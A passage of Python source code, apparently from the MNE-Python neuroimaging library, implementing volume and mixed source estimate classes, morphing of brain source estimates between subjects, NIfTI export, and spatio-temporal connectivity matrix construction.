_BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject,
verbose=verbose)
@verbose
def save(self, fname, ftype='stc', verbose=None):
"""Save the source estimates to a file
Parameters
----------
fname : string
The stem of the file name. The stem is extended with "-vl.stc"
or "-vl.w".
ftype : string
File format to use. Allowed values are "stc" (default) and "w".
The "w" format only supports a single time point.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
"""
if ftype not in ['stc', 'w']:
raise ValueError('ftype must be "stc" or "w", not "%s"' % ftype)
if ftype == 'stc':
logger.info('Writing STC to disk...')
if not (fname.endswith('-vl.stc') or fname.endswith('-vol.stc')):
fname += '-vl.stc'
_write_stc(fname, tmin=self.tmin, tstep=self.tstep,
vertices=self.vertices, data=self.data)
elif ftype == 'w':
logger.info('Writing STC to disk (w format)...')
if not (fname.endswith('-vl.w') or fname.endswith('-vol.w')):
fname += '-vl.w'
_write_w(fname, vertices=self.vertices, data=self.data)
logger.info('[done]')
def save_as_volume(self, fname, src, dest='mri', mri_resolution=False):
"""Save a volume source estimate in a nifti file
Parameters
----------
fname : string
The name of the generated nifti file.
src : list
The list of source spaces (should actually be of length 1)
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of
the original T1 image. If 'surf' the coordinate system
of the FreeSurfer surface is used (Surface RAS).
mri_resolution: bool
It True the image is saved in MRI resolution.
WARNING: if you have many time points the file produced can be
huge.
Returns
-------
img : instance Nifti1Image
The image object.
Notes
-----
.. versionadded:: 0.9.0
"""
save_stc_as_volume(fname, self, src, dest=dest,
mri_resolution=mri_resolution)
def as_volume(self, src, dest='mri', mri_resolution=False):
"""Export volume source estimate as a nifti object
Parameters
----------
src : list
The list of source spaces (should actually be of length 1)
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of
the original T1 image. If 'surf' the coordinate system
of the FreeSurfer surface is used (Surface RAS).
mri_resolution: bool
It True the image is saved in MRI resolution.
WARNING: if you have many time points the file produced can be
huge.
Returns
-------
img : instance Nifti1Image
The image object.
Notes
-----
.. versionadded:: 0.9.0
"""
return save_stc_as_volume(None, self, src, dest=dest,
mri_resolution=mri_resolution)
def __repr__(self):
if isinstance(self.vertices, list):
nv = sum([len(v) for v in self.vertices])
else:
nv = self.vertices.size
s = "%d vertices" % nv
if self.subject is not None:
s += ", subject : %s" % self.subject
s += ", tmin : %s (ms)" % (1e3 * self.tmin)
s += ", tmax : %s (ms)" % (1e3 * self.times[-1])
s += ", tstep : %s (ms)" % (1e3 * self.tstep)
s += ", data size : %s x %s" % self.shape
return "<VolSourceEstimate | %s>" % s
def get_peak(self, tmin=None, tmax=None, mode='abs',
vert_as_index=False, time_as_index=False):
"""Get location and latency of peak amplitude
Parameters
----------
tmin : float | None
The minimum point in time to be considered for peak getting.
tmax : float | None
The maximum point in time to be considered for peak getting.
mode : {'pos', 'neg', 'abs'}
How to deal with the sign of the data. If 'pos' only positive
values will be considered. If 'neg' only negative values will
be considered. If 'abs' absolute values will be considered.
Defaults to 'abs'.
vert_as_index : bool
whether to return the vertex index instead of of its ID.
Defaults to False.
time_as_index : bool
Whether to return the time index instead of the latency.
Defaults to False.
Returns
-------
pos : int
The vertex exhibiting the maximum response, either ID or index.
latency : float
The latency in seconds.
"""
vert_idx, time_idx = _get_peak(self.data, self.times, tmin, tmax,
mode)
return (vert_idx if vert_as_index else self.vertices[vert_idx],
time_idx if time_as_index else self.times[time_idx])
class MixedSourceEstimate(_BaseSourceEstimate):
"""Container for mixed surface and volume source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : list of arrays
Vertex numbers corresponding to the data.
tmin : scalar
Time point of the first sample in data.
tstep : scalar
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : list of arrays of shape (n_dipoles,)
The indices of the dipoles in each source space.
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
Notes
-----
.. versionadded:: 0.9.0
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
if not isinstance(vertices, list) or len(vertices) < 2:
raise ValueError('Vertices must be a list of numpy arrays with '
'one array per source space.')
_BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject,
verbose=verbose)
def plot_surface(self, src, subject=None, surface='inflated', hemi='lh',
colormap='auto', time_label='time=%02.f ms',
smoothing_steps=10,
transparent=None, alpha=1.0, time_viewer=False,
config_opts={}, subjects_dir=None, figure=None,
views='lat', colorbar=True, clim='auto'):
"""Plot surface source estimates with PySurfer
Note: PySurfer currently needs the SUBJECTS_DIR environment variable,
which will automatically be set by this function. Plotting multiple
SourceEstimates with different values for subjects_dir will cause
PySurfer to use the wrong FreeSurfer surfaces when using methods of
the returned Brain object. It is therefore recommended to set the
SUBJECTS_DIR environment variable or always use the same value for
subjects_dir (within the same Python session).
Parameters
----------
src : SourceSpaces
The source spaces to plot.
subject : str | None
The subject name corresponding to FreeSurfer environment
variable SUBJECT. If None stc.subject will be used. If that
is None, the environment will be used.
surface : str
The type of surface (inflated, white etc.).
hemi : str, 'lh' | 'rh' | 'split' | 'both'
The hemisphere to display. Using 'both' or 'split' requires
PySurfer version 0.4 or above.
colormap : str | np.ndarray of float, shape(n_colors, 3 | 4)
Name of colormap to use. See `plot_source_estimates`.
time_label : str
How to print info about the time instant visualized.
smoothing_steps : int
The amount of smoothing.
transparent : bool | None
If True, use a linear transparency between fmin and fmid.
None will choose automatically based on colormap type.
alpha : float
Alpha value to apply globally to the overlay.
time_viewer : bool
Display time viewer GUI.
config_opts : dict
Keyword arguments for Brain initialization.
See pysurfer.viz.Brain.
subjects_dir : str
The path to the FreeSurfer subjects reconstructions.
It corresponds to FreeSurfer environment variable SUBJECTS_DIR.
figure : instance of mayavi.core.scene.Scene | None
If None, the last figure will be cleaned and a new figure will
be created.
views : str | list
View to use. See surfer.Brain().
colorbar : bool
If True, display colorbar on scene.
clim : str | dict
Colorbar properties specification. See `plot_source_estimates`.
Returns
-------
brain : Brain
A instance of surfer.viz.Brain from PySurfer.
"""
# extract surface source spaces
surf = _ensure_src(src, kind='surf')
# extract surface source estimate
data = self.data[:surf[0]['nuse'] + surf[1]['nuse']]
vertices = [s['vertno'] for s in surf]
stc = SourceEstimate(data, vertices, self.tmin, self.tstep,
self.subject, self.verbose)
return plot_source_estimates(stc, subject, surface=surface, hemi=hemi,
colormap=colormap, time_label=time_label,
smoothing_steps=smoothing_steps,
transparent=transparent, alpha=alpha,
time_viewer=time_viewer,
config_opts=config_opts,
subjects_dir=subjects_dir, figure=figure,
views=views, colorbar=colorbar, clim=clim)
###############################################################################
# Morphing
@verbose
def _morph_buffer(data, idx_use, e, smooth, n_vertices, nearest, maps,
warn=True, verbose=None):
"""Morph data from one subject's source space to another
Parameters
----------
data : array, or csr sparse matrix
A n_vertices x n_times (or other dimension) dataset to morph.
idx_use : array of int
Vertices from the original subject's data.
e : sparse matrix
The mesh edges of the "from" subject.
smooth : int
Number of smoothing iterations to perform. A hard limit of 100 is
also imposed.
n_vertices : int
Number of vertices.
nearest : array of int
Vertices on the destination surface to use.
maps : sparse matrix
Morph map from one subject to the other.
warn : bool
If True, warn if not all vertices were used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
data_morphed : array, or csr sparse matrix
The morphed data (same type as input).
"""
n_iter = 99 # max nb of smoothing iterations (minus one)
if smooth is not None:
if smooth <= 0:
raise ValueError('The number of smoothing operations ("smooth") '
'has to be at least 1.')
smooth -= 1
# make sure we're in CSR format
e = e.tocsr()
if sparse.issparse(data):
use_sparse = True
if not isinstance(data, sparse.csr_matrix):
data = data.tocsr()
else:
use_sparse = False
done = False
# do the smoothing
for k in range(n_iter + 1):
# get the row sum
mult = np.zeros(e.shape[1])
mult[idx_use] = 1
idx_use_data = idx_use
data_sum = e * mult
# new indices are non-zero sums
idx_use = np.where(data_sum)[0]
# typically want to make the next iteration have these indices
idx_out = idx_use
# figure out if this is the last iteration
if smooth is None:
if k == n_iter or len(idx_use) >= n_vertices:
# stop when vertices filled
idx_out = None
done = True
elif k == smooth:
idx_out = None
done = True
# do standard smoothing multiplication
data = _morph_mult(data, e, use_sparse, idx_use_data, idx_out)
if done is True:
break
# do standard normalization
if use_sparse:
data.data /= data_sum[idx_use].repeat(np.diff(data.indptr))
else:
data /= data_sum[idx_use][:, None]
# do special normalization for last iteration
if use_sparse:
data_sum[data_sum == 0] = 1
data.data /= data_sum.repeat(np.diff(data.indptr))
else:
data[idx_use, :] /= data_sum[idx_use][:, None]
if len(idx_use) != len(data_sum) and warn:
warnings.warn('%s/%s vertices not included in smoothing, consider '
'increasing the number of steps'
% (len(data_sum) - len(idx_use), len(data_sum)))
logger.info(' %d smooth iterations done.' % (k + 1))
data_morphed = maps[nearest, :] * data
return data_morphed
def _morph_mult(data, e, use_sparse, idx_use_data, idx_use_out=None):
"""Helper for morphing
Equivalent to "data = (e[:, idx_use_data] * data)[idx_use_out]"
but faster.
"""
if len(idx_use_data) < e.shape[1]:
if use_sparse:
data = e[:, idx_use_data] * data
else:
# constructing a new sparse matrix is faster than sub-indexing
# e[:, idx_use_data]!
col, row = np.meshgrid(np.arange(data.shape[1]), idx_use_data)
d_sparse = sparse.csr_matrix((data.ravel(),
(row.ravel(), col.ravel())),
shape=(e.shape[1], data.shape[1]))
data = e * d_sparse
data = np.asarray(data.todense())
else:
data = e * data
# trim data
if idx_use_out is not None:
data = data[idx_use_out]
return data
def _get_subject_sphere_tris(subject, subjects_dir):
spheres = [os.path.join(subjects_dir, subject, 'surf',
xh + '.sphere.reg') for xh in ['lh', 'rh']]
tris = [read_surface(s)[1] for s in spheres]
return tris
def _sparse_argmax_nnz_row(csr_mat):
"""Return index of the maximum non-zero index in each row
"""
n_rows = csr_mat.shape[0]
idx = np.empty(n_rows, dtype=np.int)
for k in range(n_rows):
row = csr_mat[k].tocoo()
idx[k] = row.col[np.argmax(row.data)]
return idx
def _morph_sparse(stc, subject_from, subject_to, subjects_dir=None):
"""Morph sparse source estimates to an other subject
Parameters
----------
stc : SourceEstimate
The sparse STC.
subject_from : str
The subject on which stc is defined.
subject_to : str
The target subject.
subjects_dir : str
Path to SUBJECTS_DIR if it is not set in the environment.
Returns
-------
stc_morph : SourceEstimate
The morphed source estimates.
"""
maps = read_morph_map(subject_to, subject_from, subjects_dir)
stc_morph = stc.copy()
stc_morph.subject = subject_to
cnt = 0
for k, hemi in enumerate(['lh', 'rh']):
if stc.vertices[k].size > 0:
map_hemi = maps[k]
vertno_k = _sparse_argmax_nnz_row(map_hemi[stc.vertices[k]])
order = np.argsort(vertno_k)
n_active_hemi = len(vertno_k)
data_hemi = stc_morph._data[cnt:cnt + n_active_hemi]
stc_morph._data[cnt:cnt + n_active_hemi] = data_hemi[order]
stc_morph.vertices[k] = vertno_k[order]
cnt += n_active_hemi
else:
stc_morph.vertices[k] = np.array([], int)
return stc_morph
@verbose
def morph_data(subject_from, subject_to, stc_from, grade=5, smooth=None,
subjects_dir=None, buffer_size=64, n_jobs=1, warn=True,
verbose=None):
"""Morph a source estimate from one subject to another
Parameters
----------
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR
stc_from : SourceEstimate
Source estimates for subject "from" to morph
grade : int, list (of two arrays), or None
Resolution of the icosahedral mesh (typically 5). If None, all
vertices will be used (potentially filling the surface). If a list,
then values will be morphed to the set of vertices specified in
in grade[0] and grade[1]. Note that specifying the vertices (e.g.,
grade=[np.arange(10242), np.arange(10242)] for fsaverage on a
standard grade 5 source space) can be substantially faster than
computing vertex locations. Note that if subject='fsaverage'
and 'grade=5', this set of vertices will automatically be used
(instead of computed) for speed, since this is a common morph.
smooth : int or None
Number of iterations for the smoothing of the surface data.
If None, smooth is automatically defined to fill the surface
with non-zero values.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
buffer_size : int
Morph data in chunks of `buffer_size` time instants.
Saves memory when morphing long time intervals.
n_jobs : int
Number of jobs to run in parallel
warn : bool
If True, warn if not all vertices were used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
if not isinstance(stc_from, SourceEstimate):
raise ValueError('Morphing is only possible with surface source '
'estimates')
logger.info('Morphing data...')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
nearest = grade_to_vertices(subject_to, grade, subjects_dir, n_jobs)
tris = _get_subject_sphere_tris(subject_from, subjects_dir)
maps = read_morph_map(subject_from, subject_to, subjects_dir)
# morph the data
data = [stc_from.lh_data, stc_from.rh_data]
data_morphed = [None, None]
n_chunks = ceil(stc_from.data.shape[1] / float(buffer_size))
parallel, my_morph_buffer, _ = parallel_func(_morph_buffer, n_jobs)
for hemi in [0, 1]:
e = mesh_edges(tris[hemi])
e.data[e.data == 2] = 1
n_vertices = e.shape[0]
e = e + sparse.eye(n_vertices, n_vertices)
idx_use = stc_from.vertices[hemi]
if len(idx_use) == 0:
continue
data_morphed[hemi] = np.concatenate(
parallel(my_morph_buffer(data_buffer, idx_use, e, smooth,
n_vertices, nearest[hemi], maps[hemi],
warn=warn)
for data_buffer
in np.array_split(data[hemi], n_chunks, axis=1)), axis=1)
vertices = [nearest[0], nearest[1]]
if data_morphed[0] is None:
if data_morphed[1] is None:
data = np.r_[[], []]
vertices = [np.array([], int), np.array([], int)]
else:
data = data_morphed[1]
vertices = [np.array([], int), vertices[1]]
elif data_morphed[1] is None:
data = data_morphed[0]
vertices = [vertices[0], np.array([], int)]
else:
data = np.r_[data_morphed[0], data_morphed[1]]
stc_to = SourceEstimate(data, vertices, stc_from.tmin, stc_from.tstep,
subject=subject_to, verbose=stc_from.verbose)
logger.info('[done]')
return stc_to
@verbose
def compute_morph_matrix(subject_from, subject_to, vertices_from, vertices_to,
smooth=None, subjects_dir=None, warn=True,
verbose=None):
"""Get a matrix that morphs data from one subject to another
Parameters
----------
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR
vertices_from : list of arrays of int
Vertices for each hemisphere (LH, RH) for subject_from
vertices_to : list of arrays of int
Vertices for each hemisphere (LH, RH) for subject_to
smooth : int or None
Number of iterations for the smoothing of the surface data.
If None, smooth is automatically defined to fill the surface
with non-zero values.
subjects_dir : string
Path to SUBJECTS_DIR is not set in the environment
warn : bool
If True, warn if not all vertices were used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
morph_matrix : sparse matrix
matrix that morphs data from subject_from to subject_to
"""
logger.info('Computing morph matrix...')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
tris = _get_subject_sphere_tris(subject_from, subjects_dir)
maps = read_morph_map(subject_from, subject_to, subjects_dir)
morpher = [None] * 2
for hemi in [0, 1]:
e = mesh_edges(tris[hemi])
e.data[e.data == 2] = 1
n_vertices = e.shape[0]
e = e + sparse.eye(n_vertices, n_vertices)
idx_use = vertices_from[hemi]
if len(idx_use) == 0:
morpher[hemi] = []
continue
m = sparse.eye(len(idx_use), len(idx_use), format='csr')
morpher[hemi] = _morph_buffer(m, idx_use, e, smooth, n_vertices,
vertices_to[hemi], maps[hemi], warn=warn)
# be careful about zero-length arrays
if isinstance(morpher[0], list):
morpher = morpher[1]
elif isinstance(morpher[1], list):
morpher = morpher[0]
else:
morpher = sparse_block_diag(morpher, format='csr')
logger.info('[done]')
return morpher
@verbose
def grade_to_vertices(subject, grade, subjects_dir=None, n_jobs=1,
verbose=None):
"""Convert a grade to source space vertices for a given subject
Parameters
----------
subject : str
Name of the subject
grade : int
Resolution of the icosahedral mesh (typically 5). If None, all
vertices will be used (potentially filling the surface). If a list,
then values will be morphed to the set of vertices specified in
in grade[0] and grade[1]. Note that specifying the vertices (e.g.,
grade=[np.arange(10242), np.arange(10242)] for fsaverage on a
standard grade 5 source space) can be substantially faster than
computing vertex locations. Note that if subject='fsaverage'
and 'grade=5', this set of vertices will automatically be used
(instead of computed) for speed, since this is a common morph.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment
n_jobs : int
Number of jobs to run in parallel
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
vertices : list of arrays of int
Vertex numbers for LH and RH
"""
# add special case for fsaverage for speed
if subject == 'fsaverage' and grade == 5:
return [np.arange(10242), np.arange(10242)]
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
spheres_to = [os.path.join(subjects_dir, subject, 'surf',
xh + '.sphere.reg') for xh in ['lh', 'rh']]
lhs, rhs = [read_surface(s)[0] for s in spheres_to]
if grade is not None: # fill a subset of vertices
if isinstance(grade, list):
if not len(grade) == 2:
raise ValueError('grade as a list must have two elements '
'(arrays of output vertices)')
vertices = grade
else:
# find which vertices to use in "to mesh"
ico = _get_ico_tris(grade, return_surf=True)
lhs /= np.sqrt(np.sum(lhs ** 2, axis=1))[:, None]
rhs /= np.sqrt(np.sum(rhs ** 2, axis=1))[:, None]
# Compute nearest vertices in high dim mesh
parallel, my_compute_nearest, _ = \
parallel_func(_compute_nearest, n_jobs)
lhs, rhs, rr = [a.astype(np.float32)
for a in [lhs, rhs, ico['rr']]]
vertices = parallel(my_compute_nearest(xhs, rr)
for xhs in [lhs, rhs])
# Make sure the vertices are ordered
vertices = [np.sort(verts) for verts in vertices]
else: # potentially fill the surface
vertices = [np.arange(lhs.shape[0]), np.arange(rhs.shape[0])]
return vertices
def morph_data_precomputed(subject_from, subject_to, stc_from, vertices_to,
morph_mat):
"""Morph source estimate between subjects using a precomputed matrix
Parameters
----------
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR.
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR.
stc_from : SourceEstimate
Source estimates for subject "from" to morph.
vertices_to : list of array of int
The vertices on the destination subject's brain.
morph_mat : sparse matrix
The morphing matrix, typically from compute_morph_matrix.
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
if not sparse.issparse(morph_mat):
raise ValueError('morph_mat must be a sparse matrix')
if not isinstance(vertices_to, list) or not len(vertices_to) == 2:
raise ValueError('vertices_to must be a list of length 2')
if not sum(len(v) for v in vertices_to) == morph_mat.shape[0]:
raise ValueError('number of vertices in vertices_to must match '
'morph_mat.shape[0]')
if not stc_from.data.shape[0] == morph_mat.shape[1]:
raise ValueError('stc_from.data.shape[0] must be the same as '
'morph_mat.shape[0]')
if stc_from.subject is not None and stc_from.subject != subject_from:
raise ValueError('stc_from.subject and subject_from must match')
data = morph_mat * stc_from.data
stc_to = SourceEstimate(data, vertices_to, stc_from.tmin, stc_from.tstep,
verbose=stc_from.verbose, subject=subject_to)
return stc_to
@verbose
def spatio_temporal_src_connectivity(src, n_times, dist=None, verbose=None):
"""Compute connectivity for a source space activation over time
Parameters
----------
src : instance of SourceSpaces
The source space.
n_times : int
Number of time instants.
dist : float, or None
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors. If None, immediate neighbors
are extracted from an ico surface.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatio-temporal
graph structure. If N is the number of vertices in the
source space, the N first nodes in the graph are the
vertices are time 1, the nodes from 2 to 2N are the vertices
during time 2, etc.
"""
if dist is None:
if src[0]['use_tris'] is None:
raise RuntimeError("The source space does not appear to be an ico "
"surface. Connectivity cannot be extracted from"
" non-ico source spaces.")
used_verts = [np.unique(s['use_tris']) for s in src]
lh_tris = np.searchsorted(used_verts[0], src[0]['use_tris'])
rh_tris = np.searchsorted(used_verts[1], src[1]['use_tris'])
tris = np.concatenate((lh_tris, rh_tris + np.max(lh_tris) + 1))
connectivity = spatio_temporal_tris_connectivity(tris, n_times)
# deal with source space only using a subset of vertices
masks = [in1d(u, s['vertno']) for s, u in zip(src, used_verts)]
if sum(u.size for u in used_verts) != connectivity.shape[0] / n_times:
raise ValueError('Used vertices do not match connectivity shape')
if [np.sum(m) for m in masks] != [len(s['vertno']) for s in src]:
raise ValueError('Vertex mask does not match number of vertices')
masks = np.concatenate(masks)
missing = 100 * float(len(masks) - np.sum(masks)) / len(masks)
if missing:
warnings.warn('%0.1f%% of original source space vertices have been'
' omitted, tri-based connectivity will have holes.\n'
'Consider using distance-based connectivity or '
'morphing data to all source space vertices.'
% missing)
masks = np.tile(masks, n_times)
masks = np.where(masks)[0]
connectivity = connectivity.tocsr()
connectivity = connectivity[masks]
connectivity = connectivity[:, masks]
# return to original format
connectivity = connectivity.tocoo()
return connectivity
else: # use distances computed and saved in the source space file
return spatio_temporal_dist_connectivity(src, n_times, dist)
@verbose
def grade_to_tris(grade, verbose=None):
"""Get tris defined for a certain grade
Parameters
----------
grade : int
Grade of an icosahedral mesh.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
tris : list
2-element list containing Nx3 arrays of tris, suitable for use in
spatio_temporal_tris_connectivity.
"""
a = _get_ico_tris(grade, None, False)
tris = np.concatenate((a, a + (np.max(a) + 1)))
return tris
@verbose
def spatio_temporal_tris_connectivity(tris, n_times, remap_vertices=False,
verbose=None):
"""Compute connectivity from triangles and time instants
Parameters
----------
tris : array
N x 3 array defining triangles.
n_times : int
Number of time points
remap_vertices : bool
Reassign vertex indices based on unique values. Useful
to process a subset of triangles. Defaults to False.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatio-temporal
graph structure. If N is the number of vertices in the
source space, the N first nodes in the graph are the
vertices are time 1, the nodes from 2 to 2N are the vertices
during time 2, etc.
"""
if remap_vertices:
logger.info('Reassigning vertex indices.')
tris = np.searchsorted(np.unique(tris), tris)
edges = mesh_edges(tris).tocoo()
return _get_connectivity_from_edges(edges, n_times)
@verbose
def spatio_temporal_dist_connectivity(src, n_times, dist, verbose=None):
"""Compute connectivity from distances in a source space and time instants
Parameters
----------
src : instance of SourceSpaces
The source space must have distances between vertices computed, such
that src['dist'] exists and is useful. This can be obtained using MNE
with a call to mne_add_patch_info with the --dist option.
n_times : int
Number of time points
dist : float
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatio-temporal
graph structure. If N is the number of vertices in the
source space, the N first nodes in the graph are the
vertices are time 1, the nodes from 2 to 2N are the vertices
during time 2, etc.
"""
if src[0]['dist'] is None:
raise RuntimeError('src must have distances included, consider using\n'
'mne_add_patch_info with --dist argument')
edges = sparse_block_diag([s['dist'][s['vertno'], :][:, s['vertno']]
for s in src])
edges.data[:] = np.less_equal(edges.data, dist)
# clean it up and put it in coo format
edges = edges.tocsr()
edges.eliminate_zeros()
edges = edges.tocoo()
return _get_connectivity_from_edges(edges, n_times)
@verbose
def spatial_src_connectivity(src, dist=None, verbose=None):
"""Compute connectivity for a source space activation
Parameters
----------
src : instance of SourceSpaces
The source space.
dist : float, or None
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors. If None, immediate neighbors
are extracted from an ico surface.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
"""
return spatio_temporal_src_connectivity(src, 1, dist)
@verbose
def spatial_tris_connectivity(tris, remap_vertices=False, verbose=None):
"""Compute connectivity from triangles
Parameters
----------
tris : array
N x 3 array defining triangles.
remap_vertices : bool
Reassign vertex indices based on unique values. Useful
to process a subset of triangles. Defaults to False.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
"""
return spatio_temporal_tris_connectivity(tris, 1, remap_vertices)
def spatial_dist_connectivity(src, dist, verbose=None):
"""Compute connectivity from distances in a source space
Parameters
----------
src : instance of SourceSpaces
The source space must have distances between vertices computed, such
that src['dist'] exists and is useful. This can be obtained using MNE
with a call to mne_add_patch_info with the --dist option.
dist : float
Maximal geodesic distance (in m) between vertices in the
source space to consider neighbors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
"""
return spatio_temporal_dist_connectivity(src, 1, dist)
def spatial_inter_hemi_connectivity(src, dist, verbose=None):
"""Get vertices on each hemisphere that are close to the other hemisphere
Parameters
----------
src : instance of SourceSpaces
The source space. Must be surface type.
dist : float
Maximal Euclidean distance (in m) between vertices in one hemisphere
compared to the other to consider neighbors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
connectivity : sparse COO matrix
The connectivity matrix describing the spatial graph structure.
Typically this should be combined (addititively) with another
existing intra-hemispheric connectivity matrix, e.g. computed
using geodesic distances.
"""
from scipy.spatial.distance import cdist
src = _ensure_src(src, kind='surf')
conn = cdist(src[0]['rr'][src[0]['vertno']],
src[1]['rr'][src[1]['vertno']])
conn = sparse.csr_matrix(conn <= dist, dtype=int)
empties = [sparse.csr_matrix((nv, nv), dtype=int) for nv in conn.shape]
conn = sparse.vstack([sparse.hstack([empties[0], conn]),
sparse.hstack([conn.T, empties[1]])])
return conn
@verbose
def _get_connectivity_from_edges(edges, n_times, verbose=None):
"""Given edges sparse matrix, create connectivity matrix"""
n_vertices = edges.shape[0]
logger.info("-- number of connected vertices : %d" % n_vertices)
nnz = edges.col.size
aux = n_vertices * np.arange(n_times)[:, None] * np.ones((1, nnz), np.int)
col = (edges.col[None, :] + aux).ravel()
row = (edges.row[None, :] + aux).ravel()
if n_times > 1: # add temporal edges
o = (n_vertices * np.arange(n_times - 1)[:, None] +
np.arange(n_vertices)[None, :]).ravel()
d = (n_vertices * np.arange(1, n_times)[:, None] +
np.arange(n_vertices)[None, :]).ravel()
row = np.concatenate((row, o, d))
col = np.concatenate((col, d, o))
data = np.ones(edges.data.size * n_times + 2 * n_vertices * (n_times - 1),
dtype=np.int)
connectivity = coo_matrix((data, (row, col)),
shape=(n_times * n_vertices, ) * 2)
return connectivity
@verbose
def _get_ico_tris(grade, verbose=None, return_surf=False):
"""Get triangles for ico surface."""
ico = _get_ico_surface(grade)
if not return_surf:
return ico['tris']
else:
return ico
def save_stc_as_volume(fname, stc, src, dest='mri', mri_resolution=False):
"""Save a volume source estimate in a nifti file
Parameters
----------
fname : string | None
The name of the generated nifti file. If None, the image is only
returned and not saved.
stc : instance of VolSourceEstimate
The source estimate
src : list
The list of source spaces (should actually be of length 1)
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of
the original T1 image. If 'surf' the coordinate system
of the FreeSurfer surface is used (Surface RAS).
mri_resolution: bool
It True the image is saved in MRI resolution.
WARNING: if you have many time points the file produced can be
huge.
Returns
-------
img : instance Nifti1Image
The image object.
"""
if not isinstance(stc, VolSourceEstimate):
raise Exception('Only volume source estimates can be saved as '
'volumes')
n_times = stc.data.shape[1]
shape = src[0]['shape']
shape3d = (shape[2], shape[1], shape[0])
shape = (n_times, shape[2], shape[1], shape[0])
vol = np.zeros(shape)
mask3d = src[0]['inuse'].reshape(shape3d).astype(np.bool)
if mri_resolution:
mri_shape3d = (src[0]['mri_height'], src[0]['mri_depth'],
src[0]['mri_width'])
mri_shape = (n_times, src[0]['mri_height'], src[0]['mri_depth'],
src[0]['mri_width'])
mri_vol = np.zeros(mri_shape)
interpolator = src[0]['interpolator']
for k, v in enumerate(vol):
v[mask3d] = stc.data[:, k]
if mri_resolution:
mri_vol[k] = (interpolator * v.ravel()).reshape(mri_shape3d)
if mri_resolution:
vol = mri_vol
vol = vol.T
if mri_resolution:
affine = src[0]['vox_mri_t']['trans'].copy()
else:
affine = src[0]['src_mri_t']['trans'].copy()
if dest == 'mri':
affine = np.dot(src[0]['mri_ras_t']['trans'], affine)
affine[:3] *= 1e3
try:
import nibabel as nib # lazy import to avoid dependency
except ImportError:
raise ImportError("nibabel is required to save volume images.")
header = nib.nifti1.Nifti1Header()
header.set_xyzt_units('mm', 'msec')
header['pixdim'][4] = 1e3 * stc.tstep
with warnings.catch_warnings(record=True): # nibabel<->numpy warning
img = nib.Nifti1Image(vol, affine, header=header)
if fname is not None:
nib.save(img, fname)
return img
def _get_label_flip(labels, label_vertidx, src):
"""Helper function to get sign-flip for labels"""
# do the import here to avoid circular dependency
from .label import label_sign_flip
# get the sign-flip vector for every label
label_flip = list()
for label, vertidx in zip(labels, label_vertidx):
if label.hemi == 'both':
raise ValueError('BiHemiLabel not supported when using sign-flip')
if vertidx is not None:
flip = label_sign_flip(label, src)[:, None]
else:
flip = None
label_flip.append(flip)
return label_flip
@verbose
def _gen_extract_label_time_course(stcs, labels, src, mode='mean',
allow_empty=False, verbose=None):
"""Generator for extract_label_time_course"""
n_labels = len(labels)
# get vertices from source space, they have to be the same as in the stcs
vertno = [s['vertno'] for s in src]
nvert = [len(vn) for vn in vertno]
# do the initialization
label_vertidx = list()
for label in labels:
if label.hemi == 'both':
# handle BiHemiLabel
sub_labels = [label.lh, label.rh]
else:
sub_labels = [label]
this_vertidx = list()
